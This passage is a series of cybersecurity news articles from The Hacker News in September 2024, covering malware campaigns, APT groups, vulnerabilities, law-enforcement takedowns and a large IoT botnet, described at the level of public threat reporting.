"The Linux and macOS versions [of POOLRAT] use an identical function structure for loading their configurations, featuring similar method names and functionality," Zemah said.
"Additionally, the method names in both variants are strikingly similar, and the strings are almost identical. Lastly, the mechanism that handles commands from the [command-and-control server] is nearly identical."
PondRAT, a leaner version of POOLRAT, comes with capabilities to upload and download files, pause operations for a predefined time interval, and execute arbitrary commands.
"The evidence of additional Linux variants of POOLRAT showed that Gleaming Pisces has been enhancing its capabilities across both Linux and macOS platforms," Unit 42 said.
"The weaponization of legitimate-looking Python packages across multiple operating systems poses a significant risk to organizations. Successful installation of malicious third-party packages can result in malware infection that compromises an entire network."
The disclosure comes as KnowBe4, which was duped into hiring a North Korean threat actor as an employee, said more than a dozen companies "either hired North Korean employees or had been besieged by a multitude of fake resumes and applications submitted by North Koreans hoping to get a job with their organization."
It described the activity, tracked by CrowdStrike under the moniker Famous Chollima, as a "complex, industrial, scaled nation-state operation" and that it poses a "serious risk for any company with remote-only employees."
Chinese Hackers Exploit GeoServer Flaw to Target APAC Nations with EAGLEDOOR Malware
23.9.24 Virus The Hacker News
A suspected advanced persistent threat (APT) originating from China targeted a government organization in Taiwan, and possibly other countries in the Asia-Pacific (APAC) region, by exploiting a recently patched critical security flaw impacting OSGeo GeoServer GeoTools.
The intrusion activity, which was detected by Trend Micro in July 2024, has been attributed to a threat actor dubbed Earth Baxia.
"Based on the collected phishing emails, decoy documents, and observations from incidents, it appears that the targets are primarily government agencies, telecommunication businesses, and the energy industry in the Philippines, South Korea, Vietnam, Taiwan, and Thailand," researchers Ted Lee, Cyris Tseng, Pierre Lee, Sunny Lu, and Philip Chen said.
The discovery of lure documents in Simplified Chinese points to China being one of the affected countries as well, although the cybersecurity company said it does not have enough information to determine what sectors within the country have been singled out.
The multi-stage infection chain process leverages two different techniques, using spear-phishing emails and the exploitation of the GeoServer flaw (CVE-2024-36401, CVSS score: 9.8), to ultimately deliver Cobalt Strike and a previously unknown backdoor codenamed EAGLEDOOR, which allows for information gathering and payload delivery.
"The threat actor employs GrimResource and AppDomainManager injection to deploy additional payloads, aiming to lower the victim's guard," the researchers noted, adding the former method is used to download next-stage malware via a decoy MSC file dubbed RIPCOY embedded within a ZIP archive attachment.
It's worth mentioning here that Japanese cybersecurity company NTT Security Holdings recently detailed an activity cluster with links to APT41 that it said used the same two techniques to target Taiwan, the Philippines military, and Vietnamese energy organizations.
It's likely that these two intrusion sets are related, given the overlapping use of Cobalt Strike command-and-control (C2) domains that mimic Amazon Web Services, Microsoft Azure (e.g., "s3cloud-azure," "s2cloud-amazon," "s3bucket-azure," and "s3cloud-azure"), and Trend Micro itself ("trendmicrotech").
The end goal of the attacks is to deploy a custom variant of Cobalt Strike, which acts as a launchpad for the EAGLEDOOR backdoor ("Eagle.dll") via DLL side-loading.
The malware supports four methods to communicate with the C2 server over DNS, HTTP, TCP, and Telegram. While the first three protocols are used to transmit the victim status, the core functionality is realized through the Telegram Bot API to upload and download files, and execute additional payloads. The harvested data is exfiltrated via curl.exe.
"Earth Baxia, likely based in China, conducted a sophisticated campaign targeting government and energy sectors in multiple APAC countries," the researchers pointed out.
"They used advanced techniques like GeoServer exploitation, spear-phishing, and customized malware (Cobalt Strike and EAGLEDOOR) to infiltrate and exfiltrate data. The use of public cloud services for hosting malicious files and the multi-protocol support of EAGLEDOOR highlight the complexity and adaptability of their operations."
Hacktivist Group Twelve Targets Russian Entities with Destructive Cyber Attacks
20.9.24 APT The Hacker News
A hacktivist group known as Twelve has been observed using an arsenal of publicly available tools to conduct destructive cyber attacks against Russian targets.
"Rather than demand a ransom for decrypting data, Twelve prefers to encrypt victims' data and then destroy their infrastructure with a wiper to prevent recovery," Kaspersky said in a Friday analysis.
"The approach is indicative of a desire to cause maximum damage to target organizations without deriving direct financial benefit."
The hacking group, believed to have been formed in April 2023 following the onset of the Russo-Ukrainian war, has a track record of mounting cyber attacks that aim to cripple victim networks and disrupt business operations.
It has also been observed conducting hack-and-leak operations that exfiltrate sensitive information, which is then shared on its Telegram channel.
Kaspersky said Twelve shares infrastructural and tactical overlaps with a ransomware group called DARKSTAR (aka COMET or Shadow), raising the possibility that the two intrusion sets are likely related to one another or part of the same activity cluster.
"At the same time, whereas Twelve's actions are clearly hacktivist in nature, DARKSTAR sticks to the classic double extortion pattern," the Russian cybersecurity vendor said. "This variation of objectives within the syndicate underscores the complexity and diversity of modern cyberthreats."
The attack chains start with gaining initial access by abusing valid local or domain accounts, after which the Remote Desktop Protocol (RDP) is used to facilitate lateral movement. Some of these attacks are also carried out via the victim's contractors.
"To do this, they gained access to the contractor's infrastructure and then used its certificate to connect to its customer's VPN," Kaspersky noted. "Having obtained access to that, the adversary can connect to the customer's systems via the Remote Desktop Protocol (RDP) and then penetrate the customer's infrastructure."
Prominent among the other tools used by Twelve are Cobalt Strike, Mimikatz, Chisel, BloodHound, PowerView, adPEAS, CrackMapExec, Advanced IP Scanner, and PsExec for credential theft, discovery, network mapping, and privilege escalation. The malicious RDP connections to the system are tunneled through ngrok.
Also deployed are PHP web shells with capabilities to execute arbitrary commands, move files, or send emails. These programs, such as the WSO web shell, are readily available on GitHub.
In one incident investigated by Kaspersky, the threat actors are said to have exploited known security vulnerabilities (e.g., CVE-2021-21972 and CVE-2021-22005) in VMware vCenter to deliver a web shell that then was used to drop a backdoor dubbed FaceFish.
"To gain a foothold in the domain infrastructure, the adversary used PowerShell to add domain users and groups, and to modify ACLs (Access Control Lists) for Active Directory objects," it said. "To avoid detection, the attackers disguised their malware and tasks under the names of existing products or services."
Some of the names used include "Update Microsoft," "Yandex," "YandexUpdate," and "intel.exe."
The attacks are also characterized by the use of a PowerShell script ("Sophos_kill_local.ps1") to terminate processes related to Sophos security software on the compromised host.
The concluding stages entail using the Windows Task Scheduler to launch ransomware and wiper payloads, but not before gathering and exfiltrating sensitive information about their victims via a file-sharing service called DropMeFiles in the form of ZIP archives.
"The attackers used a version of the popular LockBit 3.0 ransomware, compiled from publicly available source code, to encrypt the data," Kaspersky researchers said. "Before starting work, the ransomware terminates processes that may interfere with the encryption of individual files."
The wiper, identical to the Shamoon malware, rewrites the master boot record (MBR) on connected drives and overwrites all file contents with randomly generated bytes, effectively preventing system recovery.
"The group sticks to a publicly available and familiar arsenal of malware tools, which suggests it makes none of its own," Kaspersky noted. "This makes it possible to detect and prevent Twelve's attacks in due time."
Ukraine Bans Telegram Use for Government and Military Personnel
20.9.24 Social The Hacker News
Ukraine has restricted the use of the Telegram messaging app by government officials, military personnel, and other defense and critical infrastructure workers, citing national security concerns.
The ban was announced by the National Coordination Centre for Cybersecurity (NCCC) in a post shared on Facebook.
"I have always advocated and advocate for freedom of speech, but the issue of Telegram is not a question of freedom of speech, it is a matter of national security," Kyrylo Budanov, head of Ukraine's GUR military intelligence agency, said.
Ukraine's National Security and Defense Council (NSDC) said that Telegram is "actively used by the enemy" to launch cyber attacks, spread phishing messages and malicious software, track users' whereabouts, and gather intelligence to help the Russian military target Ukraine's facilities with drones and missiles.
To that end, the use of Telegram has been proscribed on official devices of employees of state authorities, military personnel, employees of the security and defense sector, as well as enterprises that are operators of critical infrastructure.
It's worth noting that the ban does not extend to personal phones, or people who use the app as part of their official duties.
In a statement shared with Reuters, Telegram said it has not provided any personal data to any country, including Russia, and that deleted messages are permanently deleted with no way of recovering them.
The development comes weeks after Telegram's CEO was arrested in France and then released on bail in connection with an investigation into the use of the popular messaging app for child pornography, drug trafficking, and fraud.
Europol Shuts Down Major Phishing Scheme Targeting Mobile Phone Credentials
20.9.24 BigBrothers The Hacker News
Law enforcement authorities have announced the takedown of an international criminal network that leveraged a phishing platform to unlock stolen or lost mobile phones.
The phishing-as-a-service (PhaaS) platform, called iServer, is estimated to have claimed more than 483,000 victims globally, led by Chile (77,000), Colombia (70,000), Ecuador (42,000), Peru (41,500), Spain (30,000), and Argentina (29,000).
"The victims are mainly Spanish-speaking nationals from European, North American and South American countries," Europol said in a press statement.
The action, dubbed Operation Kaerb, involved the participation of law enforcement and judicial agencies from Spain, Argentina, Chile, Colombia, Ecuador, and Peru.
Pursuant to the joint exercise that took place between September 10 and 17, an Argentinian national responsible for developing and running the PhaaS service since 2018 has been arrested.
In total, the operation led to 17 arrests, 28 searches, and the seizure of 921 items, including mobile phones, electronic devices, vehicles, and weapons. As many as 1.2 million mobile phones are believed to have been unlocked to date.
"While iServer was essentially an automated phishing platform, its specific focus on harvesting credentials to unlock stolen phones set it apart from typical phishing-as-a-service offerings," Group-IB said.
iServer, per the Singapore-based company, offered a web interface that enabled low-skilled criminals, known as "unlockers," to siphon device passwords, user credentials from cloud-based mobile platforms, essentially permitting them to bypass Lost Mode and unlock the devices.
The criminal syndicate's administrator advertised the access to these unlockers, who, in turn, used iServer to not only perform phishing unlocks, but also to sell their offerings to other third-parties, such as phone thieves.
The unlockers are also responsible for sending bogus messages to phone theft victims that aim to gather data allowing access to those devices. This is accomplished by sending SMS texts that urge the recipients to locate their lost phone by clicking on a link.
This triggers a redirection chain that ultimately takes the victim to a landing page prompting them to enter their credentials, device passcode, and two-factor authentication (2FA) codes, which are then abused to gain illicit access to the device, turn off Lost Mode, and unlink the device from the owner's account.
"iServer automates the creation and delivery of phishing pages that imitate popular cloud-based mobile platforms, featuring several unique implementations that enhance its effectiveness as a cybercrime tool," Group-IB said.
Ghost Platform Goes Down in Global Action#
The development comes as Europol and the Australian Federal Police (AFP) revealed the dismantling of an encrypted communications network called Ghost ("www.ghostchat[.]net") that facilitated serious and organized crime across the world.
The platform, which came included in a custom Android smartphone for about $1,590 for a six-month subscription, was used to conduct a wide range of illegal activities, such as trafficking, money laundering, and even acts of extreme violence. It's just the latest addition to a list of similar services like Phantom Secure, EncroChat, Sky ECC, and Exclu that have been shut down on similar grounds.
"The solution used three encryption standards and offered the option to send a message followed by a specific code which would result in the self-destruction of all messages on the target phone," Europol said. "This allowed criminal networks to communicate securely, evade detection, counter forensic measures, and coordinate their illegal operations across borders."
Several thousand people are thought to have used the platform, with around 1,000 messages exchanged over the service every day prior to its disruption.
Over the course of the investigation that commenced in March 2022, 51 suspects have been arrested: 38 in Australia, 11 in Ireland, one in Canada, and one in Italy belonging to the Italian Sacra Corona Unita mafia group.
Topping the list is a 32-year-old man from Sydney, New South Wales, who has been charged with creating and administering Ghost as part of Operation Kraken, along with several others who have been accused of using the platform for trafficking cocaine and cannabis, conducting drug distribution, and manufacturing a false terrorism plot.
It's believed that the administrator, Jay Je Yoon Jung, launched the criminal enterprise nine years ago, netting him millions of dollars in illegitimate profits. He was apprehended at his home in Narwee. The operation has also resulted in the takedown of a drug lab in Australia, as well as the confiscation of weapons, drugs, and €1 million in cash.
The AFP said it infiltrated the platform's infrastructure to stage a software supply chain attack by modifying the software update process to gain access to the content stored on 376 active handsets located in Australia.
"The encrypted communication landscape has become increasingly fragmented as a result of recent law enforcement actions targeting platforms used by criminal networks," Europol noted.
"Criminal actors, in response, are now turning to a variety of less-established or custom-built communication tools that offer varying degrees of security and anonymity. By doing so, they seek new technical solutions and also utilize popular communication applications to diversify their methods."
The law enforcement agency, besides stressing the need for access to communications among suspects to tackle serious crimes, called on private companies to ensure that their platforms don't become safe havens for bad actors and provide ways for lawful data access "under judicial oversight and in full respect of fundamental rights."
Germany Takes Down 47 Cryptocurrency Exchanges #
The actions also coincide with Germany's seizure of 47 cryptocurrency exchange services hosted in the country that enabled illegal money laundering activities for cybercriminals, including ransomware groups, darknet dealers, and botnet operators. The operation has been codenamed Final Exchange.
The services have been accused of failing to implement Know Your Customer (KYC) or anti-money laundering programs and intentionally obscuring the source of criminally obtained funds, thereby allowing cybercrime to flourish. No arrests were publicly announced.
"The Exchange services enabled barter transactions without going through a registration process and without checking proof of identity," the Federal Criminal Police Office (aka Bundeskriminalamt) said. "The offer was aimed at quickly, easily and anonymously exchanging cryptocurrencies into other crypto or digital currencies in order to conceal their origin."
U.S. DoJ Charges Two for $230 Million Cryptocurrency Scam#
Capping off the law enforcement efforts to combat cybercrime, the U.S. Department of Justice (DoJ) said two suspects have been arrested and charged with conspiracy to steal and launder over $230 million in cryptocurrency from an unnamed victim in Washington D.C.
Malone Lam, 20, and Jeandiel Serrano, 21, and other co-conspirators are alleged to have carried out cryptocurrency thefts at least since August 2024 by gaining access to victims' accounts, which were then laundered through various exchanges and mixing services.
The ill-gotten proceeds were then used to fund an extravagant lifestyle, such as international travel, nightclubs, luxury automobiles, watches, jewelry, designer handbags, and rental homes in Los Angeles and Miami.
"They laundered the proceeds, including by moving the funds through various mixers and exchanges using 'peel chains,' pass-through wallets, and virtual private networks (VPNs) to mask their true identities," the DoJ said.
Iranian APT UNC1860 Linked to MOIS Facilitates Cyber Intrusions in Middle East
20.9.24 APT The Hacker News
An Iranian advanced persistent threat (APT) threat actor likely affiliated with the Ministry of Intelligence and Security (MOIS) is now acting as an initial access facilitator that provides remote access to target networks.
Google-owned Mandiant is tracking the activity cluster under the moniker UNC1860, which it said shares similarities with intrusion sets tracked by Microsoft, Cisco Talos, and Check Point as Storm-0861 (formerly DEV-0861), ShroudedSnooper, and Scarred Manticore, respectively.
"A key feature of UNC1860 is its collection of specialized tooling and passive backdoors that [...] supports several objectives, including its role as a probable initial access provider and its ability to gain persistent access to high-priority networks, such as those in the government and telecommunications space throughout the Middle East," the company said.
The group first came to light in July 2022 in connection with destructive cyber attacks targeting Albania with a ransomware strain called ROADSWEEP, the CHIMNEYSWEEP backdoor, and a ZEROCLEAR wiper variant (aka Cl Wiper), with subsequent intrusions in Albania and Israel leveraging new wipers dubbed No-Justice and BiBi (aka BABYWIPER).
Mandiant described UNC1860 as a "formidable threat actor" that maintains an arsenal of passive backdoors that are designed to obtain footholds into victim networks and set up long-term access without attracting attention.
Among these tools includes two GUI-operated malware controllers tracked as TEMPLEPLAY and VIROGREEN, which are said to provide other MOIS-associated threat actors with remote access to victim environments using remote desktop protocol (RDP).
Specifically, these controllers are designed to provide third-party operators an interface that offers instructions on the ways custom payloads could be deployed and post-exploitation activities such as internal scanning could be carried out within the target network.
Mandiant said it identified overlaps between UNC1860 and APT34 (aka Hazel Sandstorm, Helix Kitten, and OilRig) in that organizations compromised by the latter in 2019 and 2020 were previously infiltrated by UNC1860, and vice versa. Furthermore, both the clusters have been observed pivoting to Iraq-based targets, as recently highlighted by Check Point.
The attack chains involve leveraging initial access gained by opportunistic exploitation of vulnerable internet-facing servers to drop web shells and droppers like STAYSHANTE and SASHEYAWAY, with the latter leading to the execution of implants, such as TEMPLEDOOR, FACEFACE, and SPARKLOAD, that are embedded within it.
"VIROGREEN is a custom framework used to exploit vulnerable SharePoint servers with CVE-2019-0604," the researchers said, adding that it controls STAYSHANTE, along with a backdoor referred to as BASEWALK.
"The framework provides post-exploitation capabilities including [...] controlling post-exploitation payloads, backdoors (including the STAYSHANTE web shell and the BASEWALK backdoor) and tasking; controlling a compatible agent regardless of how the agent has been implanted; and executing commands and uploading/downloading files.
TEMPLEPLAY (internally named Client Http), for its part, serves as the .NET-based controller for TEMPLEDOOR. It supports backdoor instructions for executing commands via cmd.exe, upload/download files from and to the infected host, and proxy connection to a target server.
It's believed that the adversary has in its possession a diverse collection of passive tools and main-stage backdoors that align with its initial access, lateral movement, and information gathering goals.
Some of the other tools of note documented by Mandiant are listed below -
OATBOAT, a loader that loads and executes shellcode payloads
TOFUDRV, a malicious Windows driver that overlaps with WINTAPIX
TOFULOAD, a passive implant that employs undocumented Input/Output Control (IOCTL) commands for communication
TEMPLEDROP, a repurposed version of an Iranian antivirus software Windows file system filter driver named Sheed AV that's used to protect the files it deploys from modification
TEMPLELOCK, a .NET defense evasion utility that's capable of killing the Windows Event Log service
TUNNELBOI, a network controller capable of establishing a connection with a remote host and managing RDP connections
"As tensions continue to ebb and flow in the Middle East, we believe this actor's adeptness in gaining initial access to target environments represents a valuable asset for the Iranian cyber ecosystem that can be exploited to answer evolving objectives as needs shift," researchers Stav Shulman, Matan Mimran, Sarah Bock, and Mark Lechtik said.
The development comes as the U.S. government revealed Iranian threat actors' ongoing attempts to influence and undermine the upcoming U.S. elections by stealing non-public material from former President Donald Trump's campaign.
"Iranian malicious cyber actors in late June and early July sent unsolicited emails to individuals then associated with President Biden's campaign that contained an excerpt taken from stolen, non-public material from former President Trump's campaign as text in the emails," the government said.
"There is currently no information indicating those recipients replied. Furthermore, Iranian malicious cyber actors have continued their efforts since June to send stolen, non-public material associated with former President Trump's campaign to U.S. media organizations."
Iran's ramping up of its cyber operations against its perceived rivals also comes at a time when the country has become increasingly active in the Middle East region.
Late last month, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned that the Iranian APT Lemon Sandstorm (aka Fox Kitten) has carried out ransomware attacks by clandestinely partnering with NoEscape, RansomHouse, and BlackCat (aka ALPHV) crews.
Censys' analysis of the hacking group's attack infrastructure has since uncovered other, currently active hosts that are likely part of it based on commonalities based on geolocation, Autonomous System Numbers (ASNs), and identical patterns of ports and digital certificates.
"Despite attempts at obfuscation, diversion, and randomness, humans still must instantiate, operate, and decommission digital infrastructure," Censys' Matt Lembright said.
"Those humans, even if they rely upon technology to create randomization, almost always will follow some sort of pattern whether it be similar Autonomous Systems, geolocations, hosting providers, software, port distributions or certificate characteristics."
Chrome Users Can Now Sync Passkeys Across Devices with New Google PIN Feature
20.9.24 Safety The Hacker News
Google on Thursday unveiled a Password Manager PIN to let Chrome web users sync their passkeys across Windows, macOS, Linux, ChromeOS, and Android devices.
"This PIN adds an additional layer of security to ensure your passkeys are end-to-end encrypted and can't be accessed by anyone, not even Google," Chrome product manager Chirag Desai said.
The PIN is a six-digit code by default, although it's also possible to create a longer alpha-numeric PIN by selecting "PIN options."
This marks a change from the previous status quo where users could only save passkeys to save passkeys to Google Password Manager on Android.
While the passkeys could be used on other platforms, it was necessary to scan a QR code using the device where they were generated.
The latest change removes that step, making it a lot easier for users to sign in to online services using passkeys by simply scanning their biometrics. Google noted that support for iOS is expected to arrive soon.
This, however, requires the users to know either the Password Manager PIN or the screen lock for their Android devices before using passkeys on a new device.
"These recovery factors will allow you to securely access your saved passkeys and sync new ones across your computers and Android devices," Desai said.
The development comes as the tech giant said passkeys are being used by more than 400 million Google accounts as of May 2024. Two months later, the phishing-resistant alternative was made available to high-risk users via its Advanced Protection Program (APP).
Critical Ivanti Cloud Appliance Vulnerability Exploited in Active Cyberattacks
20.9.24 Vulnerebility The Hacker News
Ivanti has revealed that a critical security flaw impacting Cloud Service Appliance (CSA) has come under active exploitation in the wild.
The new vulnerability, assigned the CVE identifier CVE-2024-8963, carries a CVSS score of 9.4 out of a maximum of 10.0. It was "incidentally addressed" by the company as part of CSA 4.6 Patch 519 and CSA 5.0.
"Path Traversal in the Ivanti CSA before 4.6 Patch 519 allows a remote unauthenticated attacker to access restricted functionality," the company said in a Thursday bulletin.
It also noted that the flaw could be chained with CVE-2024-8190 (CVSS score: 7.2), permitting an attacker to bypass admin authentication and execute arbitrary commands on the appliance.
Ivanti has further warned that it's "aware of a limited number of customers who have been exploited by this vulnerability," days after it disclosed active exploitation attempts targeting CVE-2024-8190.
This indicates that the threat actors behind the activity are combining the twin flaws to achieve code execution on susceptible devices.
The development has prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to add the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply the fixes by October 10, 2024.
Users are highly recommended to upgrade to CSA version 5.0 as soon as possible, as version 4.6 is end-of-life and no longer supported.
Hackers Exploit Default Credentials in FOUNDATION Software to Breach Construction Firms
20.9.24 Vulnerebility The Hacker News
Threat actors have been observed targeting the construction sector by infiltrating the FOUNDATION Accounting Software, according to new findings from Huntress.
"Attackers have been observed brute-forcing the software at scale, and gaining access simply by using the product's default credentials," the cybersecurity company said.
Targets of the emerging threat include plumbing, HVAC (heating, ventilation, and air conditioning), concrete, and other related sub-industries.
The FOUNDATION software comes with a Microsoft SQL (MS SQL) Server to handle database operations, and, in some cases, has the TCP port 4243 open to directly access the database via a mobile app.
Huntress said the server includes two high-privileged accounts, including "sa," a default system administrator account, and "dba," an account created by FOUNDATION, that are often left with unchanged default credentials.
A consequence of this action is that threat actors could brute-force the server and leverage the xp_cmdshell configuration option to run arbitrary shell commands.
"This is an extended stored procedure that allows the execution of OS commands directly from SQL, enabling users to run shell commands and scripts as if they had access right from the system command prompt," Huntress noted.
First signs of the activity was detected by Huntress on September 14, 2024, with about 35,000 brute-force login attempts recorded against an MS SQL server on one host before gaining successful access.
Of the 500 hosts running the FOUNDATION software across the endpoints protected by the company, 33 of them have been found to be publicly accessible with default credentials. To mitigate the risk posed by such attacks, it's recommended to rotate default account credentials, cease exposing the application over the public internet if possible, and disable the xp_cmdshell option where appropriate.
New Brazilian-Linked SambaSpy Malware Targets Italian Users via Phishing Emails
19.9.24 Virus The Hacker News
A previously undocumented malware called SambaSpy is exclusively targeting users in Italy via a phishing campaign orchestrated by a suspected Brazilian Portuguese-speaking threat actor.
"Threat actors usually try to cast a wide net to maximize their profits, but these attackers are focused on just one country," Kaspersky said in a new analysis. "It's likely that the attackers are testing the waters with Italian users before expanding their operation to other countries."
The starting point of the attack is a phishing email that either includes an HTML attachment or an embedded link that initiates the infection process. Should the HTML attachment be opened, a ZIP archive containing an interim downloader or dropper is used to deploy and launch the multi-functional RAT payload.
The downloader, for its part, is responsible for fetching the malware from a remote server. The dropper, on the other hand, does the same thing, but extracts the payload from the archive instead of retrieving it from an external location.
The second infection chain with the booby-trapped link is a lot more elaborate, as clicking it redirects the user to a legitimate invoice hosted on FattureInCloud if they are not the intended target.
In an alternate scenario, clicking on the same URL takes the victim to a malicious web server that serves an HTML page with JavaScript code featuring comments written in Brazilian Portuguese.
"It redirects users to a malicious OneDrive URL but only if they are running Edge, Firefox, or Chrome with their language set to Italian," the Russian cybersecurity vendor said. "If the users don't pass these checks, they stay on the page."
Users who meet these requirements are served a PDF document hosted on Microsoft OneDrive that instructs the users to click on a hyperlink to view the document, following which they are led to a malicious JAR file hosted on MediaFire containing either the downloader or the dropper as before.
A fully-featured remote access trojan developed in Java, SambaSpy is nothing short of a Swiss Army knife that can handle file system management, process management, remote desktop management, file upload/download, webcam control, keylogging and clipboard tracking, screenshot capture, and remote shell.
It's also equipped to load additional plugins at runtime by launching a file on the disk previously downloaded by the RAT, allowing it to augment its capabilities as needed. On top of that, it's designed to steal credentials from web browsers like Chrome, Edge, Opera, Brave, Iridium, and Vivaldi.
Infrastructure evidence suggests that the threat actor behind the campaign is also setting their sights on Brazil and Spain, pointing to an operational expansion.
"There are various connections with Brazil, such as language artifacts in the code and domains targeting Brazilian users," Kaspersky said. "This aligns with the fact that attackers from Latin America often target European countries with closely related languages, namely Italy, Spain, and Portugal."
New BBTok and Mekotio Campaigns Target Latin America#
The development comes weeks after Trend Micro warned of a surge in campaigns delivering banking trojans such as BBTok, Grandoreiro, and Mekotio targeting the Latin American region via phishing scams that utilize business transactions and judicial-related transactions as lures.
Mekotio "employs a new technique where the trojan's PowerShell script is now obfuscated, enhancing its ability to evade detection," the company said, highlighting BBTok's use of phishing links to download ZIP or ISO files containing LNK files that act as a trigger point for the infections.
The LNK file is used to advance to the next step by launching the legitimate MSBuild.exe binary, which is present within the ISO file. It subsequently loads a malicious XML file also hidden within the ISO archive, which then leverages rundll32.exe to launch the BBTok DLL payload.
"By using the legitimate Windows utility MSBuild.exe, attackers can execute their malicious code while evading detection," Trend Micro noted.
The attack chains associated with Mekotio commence with a malicious URL in the phishing email that, when clicked, directs the user to a bogus website that delivers a ZIP archive, which contains a batch file that's engineered to run a PowerShell script.
The PowerShell script acts as a second-stage downloader to launch the trojan by means of an AutoHotKey script, but not before conducting a reconnaissance of the victim environment to confirm it's indeed located in one of the targeted countries.
"More sophisticated phishing scams targeting Latin American users to steal sensitive banking credentials and carry out unauthorized banking transactions underscores the urgent need for enhanced cybersecurity measures against increasingly advanced methods employed by cybercriminals," Trend Micro researchers said.
"These trojans [have] grown increasingly adept at evading detection and stealing sensitive information while the gangs behind them become bolder in targeting larger groups for more profit."
New TeamTNT Cryptojacking Campaign Targets CentOS Servers with Rootkit
19.9.24 Cryptocurrency The Hacker News
The cryptojacking operation known as TeamTNT has likely resurfaced as part of a new campaign targeting Virtual Private Server (VPS) infrastructures based on the CentOS operating system.
"The initial access was accomplished via a Secure Shell (SSH) brute force attack on the victim's assets, during which the threat actor uploaded a malicious script," Group-IB researchers Vito Alfano and Nam Le Phuong said in a Wednesday report.
The malicious script, the Singaporean cybersecurity company noted, is responsible for disabling security features, deleting logs, terminating cryptocurrency mining processes, and inhibiting recovery efforts.
The attack chains ultimately pave the way for the deployment of the Diamorphine rootkit to conceal malicious processes, while also setting up persistent remote access to the compromised host.
The campaign has been attributed to TeamTNT with moderate confidence, citing similarities in the tactics, techniques, and procedures (TTPs) observed.
TeamTNT was first discovered in the wild in 2019, undertaking illicit cryptocurrency mining activities by infiltrating cloud and container environments. While the threat actor bid farewell in November 2021 by announcing a "clean quit," public reporting has uncovered several campaigns undertaken by the hacking crew since September 2022.
The latest activity linked to the group manifests in the form of a shell script that first checks if it was previously infected by other cryptojacking operations, after which it precedes to impair device security by disabling SELinux, AppArmor, and the firewall.
"The script searches for a daemon related to the cloud provider Alibaba, named aliyun.service," the researchers said. "If it detects this daemon, it downloads a bash script from update.aegis.aliyun.com to uninstall the service."
Besides killing all competing cryptocurrency mining processes, the script takes steps to execute a series of commands to remove traces left by other miners, terminate containerized processes, and remove images deployed in connection with any coin miners.
Furthermore, it establishes persistence by configuring cron jobs that download the shell script every 30 minutes from a remote server (65.108.48[.]150) and modifying the "/root/.ssh/authorized_keys" file to add a backdoor account.
"It locks down the system by modifying file attributes, creating a backdoor user with root access, and erasing command history to hide its activities," the researchers noted. "The threat actor leaves nothing to chance; indeed, the script implements various changes within the SSH and firewall service configuration."
Microsoft Warns of New INC Ransomware Targeting U.S. Healthcare Sector
19.9.24 Ransom The Hacker News
Microsoft has revealed that a financially motivated threat actor has been observed using a ransomware strain called INC for the first time to target the healthcare sector in the U.S.
The tech giant's threat intelligence team is tracking the activity under the name Vanilla Tempest (formerly DEV-0832).
"Vanilla Tempest receives hand-offs from GootLoader infections by the threat actor Storm-0494, before deploying tools like the Supper backdoor, the legitimate AnyDesk remote monitoring and management (RMM) tool, and the MEGA data synchronization tool," it said in a series of posts shared on X.
In the next step, the attackers proceed to carry out lateral movement through Remote Desktop Protocol (RDP) and then use the Windows Management Instrumentation (WMI) Provider Host to deploy the INC ransomware payload.
The Windows maker said Vanilla Tempest has been active since at least July 2022, with previous attacks targeting education, healthcare, IT, and manufacturing sectors using various ransomware families such as BlackCat, Quantum Locker, Zeppelin, and Rhysida.
It's worth noting that the threat actor is also tracked under the name Vice Society, which is known for employing already existing lockers to carry out their attacks, as opposed to building a custom version of their own.
The development comes as ransomware groups like BianLian and Rhysida have been observed increasingly using Azure Storage Explorer and AzCopy to exfiltrate sensitive data from compromised networks in an attempt to evade detection.
"This tool, used for managing Azure storage and objects within it, is being repurposed by threat actors for large-scale data transfers to cloud storage," modePUSH researcher Britton Manahan said.
GitLab Patches Critical SAML Authentication Bypass Flaw in CE and EE Editions
19.9.24 Vulnerebility The Hacker News
GitLab has released patches to address a critical flaw impacting Community Edition (CE) and Enterprise Edition (EE) that could result in an authentication bypass.
The vulnerability is rooted in the ruby-saml library (CVE-2024-45409, CVSS score: 10.0), which could allow an attacker to log in as an arbitrary user within the vulnerable system. It was addressed by the maintainers last week.
The problem as a result of the library not properly verifying the signature of the SAML Response. SAML, short for Security Assertion Markup Language, is a protocol that enables single sign-on (SSO) and exchange of authentication and authorization data across multiple apps and websites.
"An unauthenticated attacker with access to any signed SAML document (by the IdP) can thus forge a SAML Response/Assertion with arbitrary contents, according to a security advisory. "This would allow the attacker to log in as arbitrary user within the vulnerable system."
It's worth noting the flaw also impacts omniauth-saml, which shipped an update of its own (version 2.2.1) to upgrade ruby-saml to version 1.17.
The latest patch from GitLab is designed to update the dependencies omniauth-saml to version 2.2.1 and ruby-saml to 1.17.0. This includes versions 17.3.3, 17.2.7, 17.1.8, 17.0.8, and 16.11.10.
As mitigations, GitLab is urging users of self-managed installations to enable two-factor authentication (2FA) for all accounts and disallow the SAML two-factor bypass option.
GitLab makes no mention of the flaw being exploited in the wild, but it has provided indicators of attempted or successful exploitation, suggesting that threat actors may be actively trying to capitalize on the shortcomings to gain access to susceptible GitLab instances.
"Successful exploitation attempts will trigger SAML related log events," it said. "A successful exploitation attempt will log whatever extern_id value is set by the attacker attempting exploitation."
"Unsuccessful exploitation attempts may generate a ValidationError from the RubySaml library. This could be for a variety of reasons related to the complexity of crafting a working exploit."
The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added five security flaws to its Known Exploited Vulnerabilities (KEV) catalog, including a recently disclosed critical bug impacting Apache HugeGraph-Server (CVE-2024-27348, CVSS score: 9.8), based on evidence of active exploitation.
Federal Civilian Executive Branch (FCEB) agencies have been recommended to remediate the identified vulnerabilities by October 9, 2024, to protect their networks against active threats.
New "Raptor Train" IoT Botnet Compromises Over 200,000 Devices Worldwide
19.9.24 IoT The Hacker News
Cybersecurity researchers have uncovered a never-before-seen botnet comprising an army of small office/home office (SOHO) and IoT devices that are likely operated by a Chinese nation-state threat actor called Flax Typhoon (aka Ethereal Panda or RedJuliett).
The sophisticated botnet, dubbed Raptor Train by Lumen's Black Lotus Labs, is believed to have been operational since at least May 2020, hitting a peak of 60,000 actively compromised devices in June 2023.
"Since that time, there have been more than 200,000 SOHO routers, NVR/DVR devices, network attached storage (NAS) servers, and IP cameras; all conscripted into the Raptor Train botnet, making it one of the largest Chinese state-sponsored IoT botnets discovered to-date," the cybersecurity company said in a 81-page report shared with The Hacker News.
